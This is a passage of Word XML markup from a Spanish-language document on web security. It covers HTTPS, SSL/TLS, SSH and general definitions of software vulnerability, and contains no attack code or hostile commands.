        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="00C167DB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Además, MasterBase® ha alcanzado los más altos estándares de seguridad en certificados y cuenta con la validación extendida que mencionamos anteriormente. Esto es fácilmente comprobable desde su navegador web. Por ejemplo, si usted ingresa a nuestro sitio a través de Internet Explorer verá la barra URL en verde conjuntamente con un candado que indica el uso de validación extendida:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C167DB" w:rsidRPr="00AB6551" w:rsidRDefault="00C167DB" w:rsidP="00C167DB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="00C167DB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El sistema HTTPS utiliza un cifrado basado en SSL/TLS para crear un canal cifrado (cuyo nivel de cifrado depende del servidor remoto y del navegador utilizado por el cliente) más apropiado para el tráfico de información sensible que el protocolo HTTP. De este modo se consigue que la información sensible (usuario y claves de paso normalmente) no pueda ser usada por un atacante que haya conseguido interceptar la transferencia de datos de la conexión, ya que lo único que obtendrá será un flujo de datos cifrados que le resultará imposible de descifrar. El puerto estándar para este protocolo es el 443.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C167DB" w:rsidRPr="00AB6551" w:rsidRDefault="00C167DB" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="009728E6" w:rsidRDefault="009728E6" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009728E6">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009728E6" w:rsidRPr="00AB6551" w:rsidRDefault="009728E6" w:rsidP="00205514">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="009728E6">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure </w:t>
      </w:r>
      <w:r w:rsidR="009728E6" w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es un protocolo que facilita las comunicaciones seguras entre dos sistemas usando una arquitectura cliente/servidor y que permite a los usuarios conectarse a un host remotamente. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009728E6" w:rsidRPr="00AB6551" w:rsidRDefault="009728E6" w:rsidP="009728E6">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="009728E6">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A diferencia de otros protocolos de comunicación remota tales como FTP o Telnet, SSH encripta la sesión de conexión, haciendo imposible que alguien pueda obtener contraseñas no encriptadas. SSH está diseñado para reemplazar los métodos más viejos y menos seguros para registrarse remotamente en otro sistema a través de la shell de comando, tales como telnet o rsh. Un programa relacionado, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">el scp, reemplaza otros programas diseñados para copiar archivos entre hosts como rcp. Ya que estas aplicaciones antiguas no encriptan contraseñas entre el cliente y el servidor, evite usarlas mientras le sea posible. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009728E6" w:rsidRPr="00AB6551" w:rsidRDefault="009728E6" w:rsidP="009728E6">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB6551" w:rsidRPr="00AB6551" w:rsidRDefault="00AB6551" w:rsidP="009728E6">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6551">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El uso de métodos seguros para registrarse remotamente a otros sistemas reduce los riesgos de seguridad tanto para el sistema cliente como para el sistema remoto.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:id w:val="1697122014"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00AB6551">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:color w:val="auto"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00AB6551">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:color w:val="auto"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Mas18 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00AB6551">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:color w:val="auto"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t>(Massachusetts, 2018)</w:t>
          </w:r>
          <w:r w:rsidRPr="00AB6551">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:color w:val="auto"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00A345FD" w:rsidRDefault="00A345FD" w:rsidP="00205514">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00653DA4" w:rsidRDefault="00653DA4" w:rsidP="00205514"/>
    <w:p w:rsidR="00653DA4" w:rsidRDefault="00653DA4" w:rsidP="00205514"/>
    <w:p w:rsidR="00653DA4" w:rsidRDefault="00653DA4" w:rsidP="00205514"/>
    <w:p w:rsidR="00653DA4" w:rsidRDefault="00653DA4" w:rsidP="00653DA4"/>
    <w:p w:rsidR="00653DA4" w:rsidRDefault="00653DA4" w:rsidP="00653DA4"/>
    <w:p w:rsidR="00653DA4" w:rsidRDefault="00653DA4" w:rsidP="00653DA4"/>
    <w:p w:rsidR="00ED16E1" w:rsidRDefault="00ED16E1" w:rsidP="00653DA4"/>
    <w:p w:rsidR="00ED16E1" w:rsidRDefault="00ED16E1" w:rsidP="00653DA4"/>
    <w:p w:rsidR="00653DA4" w:rsidRDefault="00653DA4" w:rsidP="00653DA4"/>
    <w:p w:rsidR="00653DA4" w:rsidRPr="00653DA4" w:rsidRDefault="00653DA4" w:rsidP="00653DA4"/>
    <w:p w:rsidR="00B95CD1" w:rsidRDefault="00B95CD1" w:rsidP="00A345FD">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B95CD1" w:rsidSect="002D6D25">
          <w:headerReference w:type="default" r:id="rId68"/>
          <w:footerReference w:type="default" r:id="rId69"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1418" w:right="1701" w:bottom="1418" w:left="1701" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A345FD" w:rsidRDefault="00A345FD" w:rsidP="00A345FD">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc514520850"/>
      <w:r w:rsidRPr="00A345FD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tipos de vulnerabilidad</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00912EEA"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabladecuadrcula4-nfasis51"/>
        <w:tblW w:w="0" w:type="auto"/>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Look w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4152"/>
        <w:gridCol w:w="2478"/>
        <w:gridCol w:w="2226"/>
        <w:gridCol w:w="4138"/>
      </w:tblGrid>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">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2180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TIPOS DE VULNERABILIDAD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07FF7373" wp14:editId="6DFCBD25">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>1537999</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>238760</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5067300" cy="3370580"/>
                  <wp:effectExtent l="1009650" t="114300" r="114300" b="172720"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="24" name="Imagen 24" descr="Resultado de imagen para que es vulnerabilidad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que es vulnerabilidad web"/>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67300" cy="3370580"/>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page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13F12164" wp14:editId="249AB100">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>105410</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>436245</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1350645" cy="1350645"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="1905"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="25" name="Imagen 25" descr="Resultado de imagen para signo de pregu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signo de pregunta"/>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350645" cy="13506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12EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>¿Qué es Vulnerabilidad?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Se define como una debilidad que se encuentra en un activo o en un control y que puede ser explotada por una o más amenazas, lo que deriva en un riesgo de seguridad.</w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:rPr>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:id w:val="-333847956"/>
                <w:citation/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidRPr="00912EEA">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidRPr="00912EEA">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:b w:val="0"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> CITATION Men14 \l 2058 </w:instrText>
                </w:r>
                <w:r w:rsidRPr="00912EEA">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="009E53AE">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:b w:val="0"/>
                    <w:noProof/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> </w:t>
                </w:r>
                <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:noProof/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:t>(Ángel, 2014)</w:t>
                </w:r>
                <w:r w:rsidRPr="00912EEA">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:sdtContent>
            </w:sdt>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Son puntos débiles del software que permiten que un atacante comprometa la integridad, disponibilidad o confidencialidad del mismo.</w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:rPr>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:id w:val="1168915531"/>
                <w:citation/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidRPr="00912EEA">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidRPr="00912EEA">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:b w:val="0"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> CITATION Cas14 \l 2058 </w:instrText>
                </w:r>
                <w:r w:rsidRPr="00912EEA">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="009E53AE">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:b w:val="0"/>
                    <w:noProof/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> </w:t>
                </w:r>
                <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:noProof/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:t>(Joshimar, 2014)</w:t>
                </w:r>
                <w:r w:rsidRPr="00912EEA">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:sdtContent>
            </w:sdt>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>¿Cuáles son los riegos en seguridad de aplicaciones?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00DD13F3" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251707392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43B88E85" wp14:editId="1A405744">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>743301</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>593725</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="6849110" cy="2505075"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="9525"/>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54968C.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId72">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6849110" cy="2505075"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
